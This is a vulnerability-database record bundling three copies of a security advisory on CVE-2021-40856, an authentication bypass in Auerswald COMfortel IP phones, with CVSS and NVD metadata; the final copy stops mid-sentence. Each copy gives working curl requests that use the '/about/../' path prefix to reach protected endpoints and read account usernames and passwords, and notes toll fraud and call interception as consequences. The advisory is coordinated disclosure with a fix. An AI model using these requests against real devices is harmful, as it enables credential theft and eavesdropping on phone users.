{"id": "PACKETSTORM:165162", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Auerswald COMfortel 1400/2600/3600 IP 2.8F Authentication Bypass", "description": "", "published": "2021-12-06T00:00:00", "modified": "2021-12-06T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/165162/Auerswald-COMfortel-1400-2600-3600-IP-2.8F-Authentication-Bypass.html", "reporter": "redteam-pentesting.de", "references": [], "cvelist": ["CVE-2021-40856"], "immutableFields": [], "lastseen": "2021-12-06T17:16:11", "viewCount": 135, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-40856"]}, {"type": "exploitdb", "idList": ["EDB-ID:50565"]}, {"type": "zdt", "idList": ["1337DAY-ID-37104"]}], "rev": 4}, "score": {"value": 5.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-40856"]}, {"type": "exploitdb", "idList": ["EDB-ID:50565"]}, {"type": "zdt", "idList": ["1337DAY-ID-37104"]}]}, "exploitation": null, "vulnersScore": 5.9}, "sourceHref": "https://packetstormsecurity.com/files/download/165162/rt-sa-2021-004.txt", "sourceData": "`Advisory: Auerswald COMfortel 1400/2600/3600 IP Authentication Bypass \n \n \nRedTeam Pentesting discovered a vulnerability in the web-based \nconfiguration management interface of the Auerswald COMfortel 1400 and \n2600 IP desktop phones. The vulnerability allows accessing configuration \ndata and settings in the web-based management interface without \nauthentication. 
\n \n \nDetails \n======= \n \nProduct: Auerswald COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP \nAffected Versions: <= 2.8F \nFixed Versions: 2.8G (for COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP) \nVulnerability Type: Authentication Bypass \nSecurity Risk: high \nVendor URL: https://www.auerswald.de \nVendor Status: fixed version released \nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-004 \nAdvisory Status: published \nCVE: CVE-2021-40856 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856 \n \n \nIntroduction \n============ \n \n\"The COMfortel 2600 IP is an Android-based hybrid VoIP telephone (SIP and \nIP system phone), with 4.3\" colour touch display and preconfigured \nanswering machine\" \n \n(from the vendor's homepage) \n \n \nMore Details \n============ \n \nDuring a penetration test it was discovered that several VoIP phones \n(COMfortel 2600 and 1400 IP) by the manufacturer Auerswald allow \naccessing administrative functions without login credentials, bypassing \nthe authentication. This can be achieved by simply prefixing API \nendpoints that require authentication with \"/about/../\", since the \n\"/about\" endpoint does not require any authentication. \n \n \nProof of Concept \n================ \n \nThe phones run a web-based management interface on Port 80. If accessed, \nthe HTTP response code 401 together with a website redirecting to the \npath \"/statics/pageChallenge.html\" is returned. This can for example be \nseen using the command-line HTTP client curl[1] as follows: \n \n------------------------------------------------------------------------ \n$ curl --include 'http://192.168.1.190/' \nHTTP/1.1 401 Unauthorized \n[...] 
\n \n<!DOCTYPE html><html><head><meta http-equiv='refresh' content='0; \nURL=/statics/pageChallenge.html'></head><body></body></html> \n------------------------------------------------------------------------ \n \nThe website contains JavaScript code that requests the path \n\"/about?action=get\" and loads a JSON document (formatted and shortened \nto increase readability): \n \n------------------------------------------------------------------------ \n$ curl --include 'http://192.168.1.190/about?action=get' \n \nHTTP/1.1 200 OK \nContent-Type: application/json; charset=utf-8; \nCache-Control: no-cache \nContent-Length: 3673 \nDate: Mon, 30 Aug 2021 08:39:24 GMT \nServer: lighttpd \n \n{ \n\"DATA\": { \n\"firmware\": { \n\"TYPE\": \"DATAITEM\", \n\"VALUE\": \"2.8E\", \n\"KEY\": \"firmware\" \n}, \n\"serial\": { \n\"TYPE\": \"DATAITEM\", \n\"VALUE\": \"1234567890\", \n\"KEY\": \"serial\" \n}, \n[...] \n} \n} \n \n------------------------------------------------------------------------ \n \nAmong other information, this JSON document contains the serial number \nand firmware version displayed on the website. This action can be \naccessed without authentication. Other endpoints require authentication, \nfor example the path \"/tree?action=get\", from which the menu structure \nis loaded after successful authentication: \n \n------------------------------------------------------------------------ \n$ curl --include 'http://192.168.1.190/tree?action=get' \nHTTP/1.1 401 Unauthorized \n[...] \n \n<!DOCTYPE html><html><head><meta http-equiv='refresh' content='0; \nURL=/statics/pageChallenge.html'></head><body></body></html> \n------------------------------------------------------------------------ \n \nDuring the penetration test, it was discovered that this action can \nsuccessfully be requested by inserting the prefix \"/about/../\". 
In order \nto prevent curl from normalizing the URL path, the option \"--path-as-is\" \nmust be supplied: \n \n------------------------------------------------------------------------ \n$ curl --include --path-as-is \\ \n'http://192.168.1.190/about/../tree?action=get' \n \nHTTP/1.1 200 OK \nContent-Type: application/json; charset=utf-8; \nCache-Control: no-cache \nContent-Length: 3808 \nDate: Mon, 30 Aug 2021 08:42:11 GMT \nServer: lighttpd \n \n{ \n\"TYPE\": \"TREENODEPAGE\", \n\"ITEMS\": { \n\"COUNT\": 2, \n\"TYPE\": \"ITEMLIST\", \n\"1\": { \n\"id\": 31, \n\"text\": \"applications_settings\", \n\"TYPE\": \"TREENODEPAGE\", \n\"ITEMS\": { \n\"COUNT\": 1, \n\"TYPE\": \"ITEMLIST\", \n\"0\": { \n\"target\": \"pageFunctionkeys.html\", \n\"id\": 32, \n\"action\": \"/functionkeys\", \n\"text\": \"key_app\", \n\"pagename\": \"Functionkeys\", \n\"TYPE\": \"TREENODEPAGE\" \n} \n} \n}, \n[...] \n} \n} \n------------------------------------------------------------------------ \n \nThe endpoint \"/account\" allows listing account data: \n \n------------------------------------------------------------------------ \n$ curl --include --path-as-is \\ \n'http://192.168.1.190/about/../account?action=list' \n \nHTTP/1.1 200 OK \nContent-Type: application/json; charset=utf-8; \nCache-Control: no-cache \nContent-Length: 793 \nDate: Mon, 30 Aug 2021 08:43:33 GMT \nServer: lighttpd \n \n{ \n\"DATA\": { \n[...] \n\"accountList0\": { \n\"KEY\": \"accountList0\", \n\"COUNT\": 1, \n\"TYPE\": \"DATAMODEL\", \n\"VALUE\": { \n\"0\": { \n\"ID\": 32327, \n\"PARENTID\": 0, \n\"PROVIDER\": \"ProviderName\", \n\"NAME\": \"123 Example User\", \n\"STATUS\": 4, \n\"DEFAULT\": 1 \n} \n}, \n[...] 
\n}, \n} \n} \n------------------------------------------------------------------------ \n \nThe ID 32327 can then be used to get details about that particular \naccount, including the username and password: \n \n------------------------------------------------------------------------ \n$ curl --include --path-as-is \\ \n'http://192.168.1.190/about/../account?action=get&itemID=32327' \n \nHTTP/1.1 200 OK \nContent-Type: application/json; charset=utf-8; \nCache-Control: no-cache \nContent-Length: 2026 \nDate: Mon, 30 Aug 2021 08:44:13 GMT \nServer: lighttpd \n \n{ \n\"DATA\": { \n[...] \n\"Benutzer\": { \n\"TYPE\": \"DATAITEM\", \n\"VALUE\": \"123\", \n\"KEY\": \"Benutzer\" \n}, \n\"Passwort\": { \n\"TYPE\": \"DATAITEM\", \n\"VALUE\": \"secret\", \n\"KEY\": \"Passwort\" \n}, \n[...] \n} \n} \n------------------------------------------------------------------------ \n \nUsing a script for Zed Attack Proxy[2], RedTeam Pentesting managed to \naccess and use the web-based management interface as if regular login \ncredentials were presented. \n \nIt is likely that other functionality can be accessed in the same way, \nto for example change settings or activate the integrated option for \nrecording the Ethernet traffic. \n \n \nWorkaround \n========== \n \nDisable the web-based management interface if possible. \n \n \nFix \n=== \n \nUpgrade to a firmware version which corrects this vulnerability. \n \n \nSecurity Risk \n============= \n \nInserting the prefix \"/about/../\" allows bypassing the authentication \ncheck for the web-based configuration management interface. This enables \nattackers to gain access to the login credentials used for \nauthentication at the PBX, among other data. \n \nAttackers can then authenticate at the PBX as the respective phone and \nfor example call premium rate phone lines they operate to generate \nrevenue. 
They can also configure a device they control as the PBX in the \nphone, so all incoming and outgoing phone calls are intercepted and can \nbe recorded. The device also contains a function to record all Ethernet \ndata traffic, which is likely affected as well. \n \nOverall, the vulnerability completely bypasses the authentication for \nthe web-based management interface and therefore poses a high risk. \n \n \nReferences \n========== \n \n[1] https://curl.se \n[2] https://github.com/zaproxy/zaproxy/ \n \nTimeline \n======== \n \n2021-08-26 Vulnerability identified \n2021-09-01 Customer approved disclosure to vendor \n2021-09-10 Vendor notified \n2021-09-10 CVE ID requested \n2021-09-10 CVE ID assigned \n2021-10-04 Vendor provides access to device with fixed firmware \n2021-10-05 RedTeam Pentesting examines device, vulnerability seems to be corrected \n2021-10-14 Vendor releases corrected firmware version 2.8G \n2021-12-06 Advisory published \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting offers individual penetration tests performed by a \nteam of specialised IT-security experts. In this way, security weaknesses in \ncompany networks or products are uncovered and can be fixed immediately. \n \nAs there are only a few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity-related areas. The results are made available as public \nsecurity advisories. \n \nMore information about RedTeam Pentesting can be found at: \nhttps://www.redteam-pentesting.de/ \n \n \nWorking at RedTeam Pentesting \n============================= \n \nRedTeam Pentesting is looking for penetration testers to join our team \nin Aachen, Germany. If you are interested please visit: \nhttps://www.redteam-pentesting.de/jobs/ \n \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0 \nDennewartstr. 
25-27 Fax : +49 241 510081-99 \n52068 Aachen https://www.redteam-pentesting.de \nGermany Registergericht: Aachen HRB 14004 \nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen \n`\n", "_state": {"dependencies": 1646501628}}
{"cve": [{"lastseen": "2022-03-23T19:13:33", "description": "Auerswald COMfortel 1400 IP and 2600 IP before 2.8G devices allow Authentication Bypass via the /about/../ substring.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-13T04:15:00", "type": "cve", "title": "CVE-2021-40856", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40856"], "modified": "2022-01-04T16:08:00", "cpe": ["cpe:/o:auerswald:comfortel_1400_ip_firmware:2.8f", "cpe:/o:auerswald:comfortel_3600_ip_firmware:2.8f", "cpe:/o:auerswald:comfortel_2600_ip_firmware:2.8f"], "id": "CVE-2021-40856", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40856", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:auerswald:comfortel_2600_ip_firmware:2.8f:*:*:*:*:*:*:*", "cpe:2.3:o:auerswald:comfortel_1400_ip_firmware:2.8f:*:*:*:*:*:*:*", "cpe:2.3:o:auerswald:comfortel_3600_ip_firmware:2.8f:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2021-12-27T01:17:57", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-06T00:00:00", "type": "zdt", "title": "Auerswald COMfortel 2.8F - Authentication Bypass Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40856"], "modified": "2021-12-06T00:00:00", "id": "1337DAY-ID-37104", "href": "https://0day.today/exploit/description/37104", "sourceData": "# Exploit Title: Auerswald COMfortel 2.8F - Authentication Bypass\n# Exploit Author: RedTeam Pentesting GmbH\n# Version: 1400/2600/3600\n\nAdvisory: Auerswald COMfortel 1400/2600/3600 IP Authentication Bypass\n\n\nRedTeam Pentesting discovered a vulnerability in the web-based\nconfiguration management interface of the Auerswald COMfortel 1400 and\n2600 IP desktop phones. 
The vulnerability allows accessing configuration\ndata and settings in the web-based management interface without\nauthentication.\n\n\nDetails\n=======\n\nProduct: Auerswald COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP\nAffected Versions: <= 2.8F\nFixed Versions: 2.8G (for COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP)\nVulnerability Type: Authentication Bypass\nSecurity Risk: high\nVendor URL: https://www.auerswald.de\nVendor Status: fixed version released\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-004\nAdvisory Status: published\nCVE: CVE-2021-40856\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856\n\n\nIntroduction\n============\n\n\"The COMfortel 2600 IP is an Android-based hybrid VoIP telephone (SIP and\nIP system phone), with 4.3\" colour touch display and preconfigured\nanswering machine\"\n\n(from the vendor's homepage)\n\n\nMore Details\n============\n\nDuring a penetration test it was discovered that several VoIP phones\n(COMfortel 2600 and 1400 IP) by the manufacturer Auerswald allow\naccessing administrative functions without login credentials, bypassing\nthe authentication. This can be achieved by simply prefixing API\nendpoints that require authentication with \"/about/../\", since the\n\"/about\" endpoint does not require any authentication.\n\n\nProof of Concept\n================\n\nThe phones run a web-based management interface on Port 80. If accessed,\nthe HTTP response code 401 together with a website redirecting to the\npath \"/statics/pageChallenge.html\" is returned. 
This can for example be\nseen using the command-line HTTP client curl[1] as follows:\n\n------------------------------------------------------------------------\n$ curl --include 'http://192.168.1.190/'\nHTTP/1.1 401 Unauthorized\n[...]\n\n<!DOCTYPE html><html><head><meta http-equiv='refresh' content='0;\nURL=/statics/pageChallenge.html'></head><body></body></html>\n------------------------------------------------------------------------\n\nThe website contains JavaScript code that requests the path\n\"/about?action=get\" and loads a JSON document (formatted and shortened\nto increase readability):\n\n------------------------------------------------------------------------\n$ curl --include 'http://192.168.1.190/about?action=get'\n\nHTTP/1.1 200 OK\nContent-Type: application/json; charset=utf-8;\nCache-Control: no-cache\nContent-Length: 3673\nDate: Mon, 30 Aug 2021 08:39:24 GMT\nServer: lighttpd\n\n{\n \"DATA\": {\n \"firmware\": {\n \"TYPE\": \"DATAITEM\",\n \"VALUE\": \"2.8E\",\n \"KEY\": \"firmware\"\n },\n \"serial\": {\n \"TYPE\": \"DATAITEM\",\n \"VALUE\": \"1234567890\",\n \"KEY\": \"serial\"\n },\n [...]\n }\n}\n\n------------------------------------------------------------------------\n\nAmong other information, this JSON document contains the serial number\nand firmware version displayed on the website. This action can be\naccessed without authentication. 
Other endpoints require authentication,\nfor example the path \"/tree?action=get\", from which the menu structure\nis loaded after successful authentication:\n\n------------------------------------------------------------------------\n$ curl --include 'http://192.168.1.190/tree?action=get'\nHTTP/1.1 401 Unauthorized\n[...]\n\n<!DOCTYPE html><html><head><meta http-equiv='refresh' content='0;\nURL=/statics/pageChallenge.html'></head><body></body></html>\n------------------------------------------------------------------------\n\nDuring the penetration test, it was discovered that this action can\nsuccessfully be requested by inserting the prefix \"/about/../\". In order\nto prevent curl from normalizing the URL path, the option \"--path-as-is\"\nmust be supplied:\n\n------------------------------------------------------------------------\n$ curl --include --path-as-is \\\n 'http://192.168.1.190/about/../tree?action=get'\n\nHTTP/1.1 200 OK\nContent-Type: application/json; charset=utf-8;\nCache-Control: no-cache\nContent-Length: 3808\nDate: Mon, 30 Aug 2021 08:42:11 GMT\nServer: lighttpd\n\n{\n \"TYPE\": \"TREENODEPAGE\",\n \"ITEMS\": {\n \"COUNT\": 2,\n \"TYPE\": \"ITEMLIST\",\n \"1\": {\n \"id\": 31,\n \"text\": \"applications_settings\",\n \"TYPE\": \"TREENODEPAGE\",\n \"ITEMS\": {\n \"COUNT\": 1,\n \"TYPE\": \"ITEMLIST\",\n \"0\": {\n \"target\": \"pageFunctionkeys.html\",\n \"id\": 32,\n \"action\": \"/functionkeys\",\n \"text\": \"key_app\",\n \"pagename\": \"Functionkeys\",\n \"TYPE\": \"TREENODEPAGE\"\n }\n }\n },\n [...]\n }\n}\n------------------------------------------------------------------------\n\nThe endpoint \"/account\" allows listing account data:\n\n------------------------------------------------------------------------\n$ curl --include --path-as-is \\\n 'http://192.168.1.190/about/../account?action=list'\n\nHTTP/1.1 200 OK\nContent-Type: application/json; charset=utf-8;\nCache-Control: no-cache\nContent-Length: 793\nDate: Mon, 30 Aug 2021 
08:43:33 GMT\nServer: lighttpd\n\n{\n \"DATA\": {\n [...]\n \"accountList0\": {\n \"KEY\": \"accountList0\",\n \"COUNT\": 1,\n \"TYPE\": \"DATAMODEL\",\n \"VALUE\": {\n \"0\": {\n \"ID\": 32327,\n \"PARENTID\": 0,\n \"PROVIDER\": \"ProviderName\",\n \"NAME\": \"123 Example User\",\n \"STATUS\": 4,\n \"DEFAULT\": 1\n }\n },\n [...]\n },\n }\n}\n------------------------------------------------------------------------\n\nThe ID 32327 can then be used to get details about that particular\naccount, including the username and password:\n\n------------------------------------------------------------------------\n$ curl --include --path-as-is \\\n 'http://192.168.1.190/about/../account?action=get&itemID=32327'\n\nHTTP/1.1 200 OK\nContent-Type: application/json; charset=utf-8;\nCache-Control: no-cache\nContent-Length: 2026\nDate: Mon, 30 Aug 2021 08:44:13 GMT\nServer: lighttpd\n\n{\n \"DATA\": {\n [...]\n \"Benutzer\": {\n \"TYPE\": \"DATAITEM\",\n \"VALUE\": \"123\",\n \"KEY\": \"Benutzer\"\n },\n \"Passwort\": {\n \"TYPE\": \"DATAITEM\",\n \"VALUE\": \"secret\",\n \"KEY\": \"Passwort\"\n },\n [...]\n }\n}\n------------------------------------------------------------------------\n\nUsing a script for Zed Attack Proxy[2], RedTeam Pentesting managed to\naccess and use the web-based management interface as if regular login\ncredentials were presented.\n\nIt is likely that other functionality can be accessed in the same way,\nto for example change settings or activate the integrated option for\nrecording the Ethernet traffic.\n\n\nWorkaround\n==========\n\nDisable the web-based management interface if possible.\n\n\nFix\n===\n\nUpgrade to a firmware version which corrects this vulnerability.\n\n\nSecurity Risk\n=============\n\nInserting the prefix \"/about/../\" allows bypassing the authentication\ncheck for the web-based configuration management interface. 
This enables\nattackers to gain access to the login credentials used for\nauthentication at the PBX, among other data.\n\nAttackers can then authenticate at the PBX as the respective phone and\nfor example call premium rate phone lines they operate to generate\nrevenue. They can also configure a device they control as the PBX in the\nphone, so all incoming and outgoing phone calls are intercepted and can\nbe recorded. The device also contains a function to record all Ethernet\ndata traffic, which is likely affected as well.\n\nOverall, the vulnerability completely bypasses the authentication for\nthe web-based management interface and therefore poses a high risk.\n\n\nReferences\n==========\n\n[1] https://curl.se\n[2] https://github.com/zaproxy/zaproxy/\n\nTimeline\n========\n\n2021-08-26 Vulnerability identified\n2021-09-01 Customer approved disclosure to vendor\n2021-09-10 Vendor notified\n2021-09-10 CVE ID requested\n2021-09-10 CVE ID assigned\n2021-10-04 Vendor provides access to device with fixed firmware\n2021-10-05 RedTeam Pentesting examines device, vulnerability seems to be corrected\n2021-10-14 Vendor releases corrected firmware version 2.8G\n2021-12-06 Advisory published\n\n", "sourceHref": "https://0day.today/exploit/37104", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2022-01-13T05:28:00", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-06T00:00:00", "type": "exploitdb", "title": "Auerswald COMfortel 2.8F - Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40856"], "modified": "2021-12-06T00:00:00", "id": "EDB-ID:50565", "href": "https://www.exploit-db.com/exploits/50565", "sourceData": "# Exploit Title: Auerswald COMfortel 2.8F - Authentication Bypass\r\n# Date: 06/12/2021\r\n# Exploit Author: RedTeam Pentesting GmbH\r\n# Version: 1400/2600/3600\r\n\r\nAdvisory: Auerswald COMfortel 1400/2600/3600 IP Authentication Bypass\r\n\r\n\r\nRedTeam Pentesting discovered a vulnerability in the web-based\r\nconfiguration management interface of the Auerswald COMfortel 1400 and\r\n2600 IP desktop phones. 
The vulnerability allows accessing configuration\r\ndata and settings in the web-based management interface without\r\nauthentication.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nProduct: Auerswald COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP\r\nAffected Versions: <= 2.8F\r\nFixed Versions: 2.8G (for COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP)\r\nVulnerability Type: Authentication Bypass\r\nSecurity Risk: high\r\nVendor URL: https://www.auerswald.de\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-004\r\nAdvisory Status: published\r\nCVE: CVE-2021-40856\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n\"The COMfortel 2600 IP is an Android-based hybrid VoIP telephone (SIP and\r\nIP system phone), with 4.3\" colour touch display and preconfigured\r\nanswering machine\"\r\n\r\n(from the vendor's homepage)\r\n\r\n\r\nMore Details\r\n============\r\n\r\nDuring a penetration test it was discovered that several VoIP phones\r\n(COMfortel 2600 and 1400 IP) by the manufacturer Auerswald allow\r\naccessing administrative functions without login credentials, bypassing\r\nthe authentication. This can be achieved by simply prefixing API\r\nendpoints that require authentication with \"/about/../\", since the\r\n\"/about\" endpoint does not require any authentication.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nThe phones run a web-based management interface on Port 80. If accessed,\r\nthe HTTP response code 401 together with a website redirecting to the\r\npath \"/statics/pageChallenge.html\" is returned. 
This can for example be\r\nseen using the command-line HTTP client curl[1] as follows:\r\n\r\n------------------------------------------------------------------------\r\n$ curl --include 'http://192.168.1.190/'\r\nHTTP/1.1 401 Unauthorized\r\n[...]\r\n\r\n<!DOCTYPE html><html><head><meta http-equiv='refresh' content='0;\r\nURL=/statics/pageChallenge.html'></head><body></body></html>\r\n------------------------------------------------------------------------\r\n\r\nThe website contains JavaScript code that requests the path\r\n\"/about?action=get\" and loads a JSON document (formatted and shortened\r\nto increase readability):\r\n\r\n------------------------------------------------------------------------\r\n$ curl --include 'http://192.168.1.190/about?action=get'\r\n\r\nHTTP/1.1 200 OK\r\nContent-Type: application/json; charset=utf-8;\r\nCache-Control: no-cache\r\nContent-Length: 3673\r\nDate: Mon, 30 Aug 2021 08:39:24 GMT\r\nServer: lighttpd\r\n\r\n{\r\n \"DATA\": {\r\n \"firmware\": {\r\n \"TYPE\": \"DATAITEM\",\r\n \"VALUE\": \"2.8E\",\r\n \"KEY\": \"firmware\"\r\n },\r\n \"serial\": {\r\n \"TYPE\": \"DATAITEM\",\r\n \"VALUE\": \"1234567890\",\r\n \"KEY\": \"serial\"\r\n },\r\n [...]\r\n }\r\n}\r\n\r\n------------------------------------------------------------------------\r\n\r\nAmong other information, this JSON document contains the serial number\r\nand firmware version displayed on the website. This action can be\r\naccessed without authentication. 
Other endpoints require authentication,\r\nfor example the path \"/tree?action=get\", from which the menu structure\r\nis loaded after successful authentication:\r\n\r\n------------------------------------------------------------------------\r\n$ curl --include 'http://192.168.1.190/tree?action=get'\r\nHTTP/1.1 401 Unauthorized\r\n[...]\r\n\r\n<!DOCTYPE html><html><head><meta http-equiv='refresh' content='0;\r\nURL=/statics/pageChallenge.html'></head><body></body></html>\r\n------------------------------------------------------------------------\r\n\r\nDuring the penetration test, it was discovered that this action can\r\nsuccessfully be requested by inserting the prefix \"/about/../\". In order\r\nto prevent curl from normalizing the URL path, the option \"--path-as-is\"\r\nmust be supplied:\r\n\r\n------------------------------------------------------------------------\r\n$ curl --include --path-as-is \\\r\n 'http://192.168.1.190/about/../tree?action=get'\r\n\r\nHTTP/1.1 200 OK\r\nContent-Type: application/json; charset=utf-8;\r\nCache-Control: no-cache\r\nContent-Length: 3808\r\nDate: Mon, 30 Aug 2021 08:42:11 GMT\r\nServer: lighttpd\r\n\r\n{\r\n \"TYPE\": \"TREENODEPAGE\",\r\n \"ITEMS\": {\r\n \"COUNT\": 2,\r\n \"TYPE\": \"ITEMLIST\",\r\n \"1\": {\r\n \"id\": 31,\r\n \"text\": \"applications_settings\",\r\n \"TYPE\": \"TREENODEPAGE\",\r\n \"ITEMS\": {\r\n \"COUNT\": 1,\r\n \"TYPE\": \"ITEMLIST\",\r\n \"0\": {\r\n \"target\": \"pageFunctionkeys.html\",\r\n \"id\": 32,\r\n \"action\": \"/functionkeys\",\r\n \"text\": \"key_app\",\r\n \"pagename\": \"Functionkeys\",\r\n \"TYPE\": \"TREENODEPAGE\"\r\n }\r\n }\r\n },\r\n [...]\r\n }\r\n}\r\n------------------------------------------------------------------------\r\n\r\nThe endpoint \"/account\" allows listing account data:\r\n\r\n------------------------------------------------------------------------\r\n$ curl --include --path-as-is \\\r\n 'http://192.168.1.190/about/../account?action=list'\r\n\r\nHTTP/1.1 200 
OK\r\nContent-Type: application/json; charset=utf-8;\r\nCache-Control: no-cache\r\nContent-Length: 793\r\nDate: Mon, 30 Aug 2021 08:43:33 GMT\r\nServer: lighttpd\r\n\r\n{\r\n \"DATA\": {\r\n [...]\r\n \"accountList0\": {\r\n \"KEY\": \"accountList0\",\r\n \"COUNT\": 1,\r\n \"TYPE\": \"DATAMODEL\",\r\n \"VALUE\": {\r\n \"0\": {\r\n \"ID\": 32327,\r\n \"PARENTID\": 0,\r\n \"PROVIDER\": \"ProviderName\",\r\n \"NAME\": \"123 Example User\",\r\n \"STATUS\": 4,\r\n \"DEFAULT\": 1\r\n }\r\n },\r\n [...]\r\n },\r\n }\r\n}\r\n------------------------------------------------------------------------\r\n\r\nThe ID 32327 can then be used to get details about that particular\r\naccount, including the username and password:\r\n\r\n------------------------------------------------------------------------\r\n$ curl --include --path-as-is \\\r\n 'http://192.168.1.190/about/../account?action=get&itemID=32327'\r\n\r\nHTTP/1.1 200 OK\r\nContent-Type: application/json; charset=utf-8;\r\nCache-Control: no-cache\r\nContent-Length: 2026\r\nDate: Mon, 30 Aug 2021 08:44:13 GMT\r\nServer: lighttpd\r\n\r\n{\r\n \"DATA\": {\r\n [...]\r\n \"Benutzer\": {\r\n \"TYPE\": \"DATAITEM\",\r\n \"VALUE\": \"123\",\r\n \"KEY\": \"Benutzer\"\r\n },\r\n \"Passwort\": {\r\n \"TYPE\": \"DATAITEM\",\r\n \"VALUE\": \"secret\",\r\n \"KEY\": \"Passwort\"\r\n },\r\n [...]\r\n }\r\n}\r\n------------------------------------------------------------------------\r\n\r\nUsing a script for Zed Attack Proxy[2], RedTeam Pentesting managed to\r\naccess and use the web-based management interface as if regular login\r\ncredentials were presented.\r\n\r\nIt is likely that other functionality can be accessed in the same way,\r\nto for example change settings or activate the integrated option for\r\nrecording the Ethernet traffic.\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nDisable the web-based management interface if possible.\r\n\r\n\r\nFix\r\n===\r\n\r\nUpgrade to a firmware version which corrects this 
